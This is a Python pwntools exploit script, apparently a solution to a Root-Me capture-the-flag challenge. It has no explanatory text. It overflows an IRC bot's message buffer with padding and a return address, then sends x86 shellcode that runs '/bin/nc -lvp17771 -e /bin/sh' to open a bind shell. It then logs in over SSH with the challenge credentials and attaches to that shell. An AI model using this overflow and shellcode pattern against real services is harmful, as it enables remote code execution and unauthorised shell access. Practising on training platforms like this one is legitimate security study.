from pwn import *nick = "Pown3dBot"mynick = "pedro1"print('Connecting...

1. from pwn import *
2. nick = "Pown3dBot"
3. mynick = "pedro1"
4.  
5. print('Connecting...')
6.  
7. r = remote('irc.root-me.org', 6667) #connection to the irc server
8. res = r.recvuntil('instead.')
9. print(res)
10.  
11. r.send('NICK ' + mynick + '\r\n')
12. r.send('USER PythonBot my.host.name humm : My Real Name\r\n')
13.  
14. res = r.recvuntil(mynick + ' +x')
15. print(res)
16.  
17. payload = 'A' * 99 + '\x24\xb1\x04\x08' + 'JOIN'
18. r.send('PRIVMSG ' + nick + ' :!' + payload + '\r\n') # sending to the socket
19. res = r.recvline()
20. print(res)
21.  
22. payload = '\x90\x90\x90\x31\xc0\x31\xd2\x50\x68\x37\x37\x37\x31\x68\x2d\x76\x70\x31\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x52\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80' + '\x90\x90' + 'PRIVMSG '
23. r.send('PRIVMSG ' + nick + ' :!' + payload + '\r\n') # sending to the socket
24. res = r.recvline()
25. print(res)
26.  
27. r.send('PRIVMSG ' + nick + ' :AAAA\r\n') # sending to the socket
28. res = r.recvline()
29. print(res)
30.  
31. s = ssh(host='challenge02.root-me.org', port=2222, user='app-systeme-ch31', password='app-systeme-ch31')
32. shell_nc = s.process(['/bin/nc', 'localhost', '17771'])
33. shell_nc.interactive()